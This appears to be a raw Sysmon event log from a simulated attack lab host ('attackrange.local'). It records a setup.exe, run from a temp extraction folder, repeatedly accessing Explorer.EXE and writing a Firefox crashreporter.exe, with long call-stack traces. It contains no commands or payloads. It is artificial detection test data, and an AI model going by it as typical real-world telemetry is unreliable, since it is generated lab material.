C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\crashreporter.exe2021-01-18 13:59:52.255 10341000x800000000000000014626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
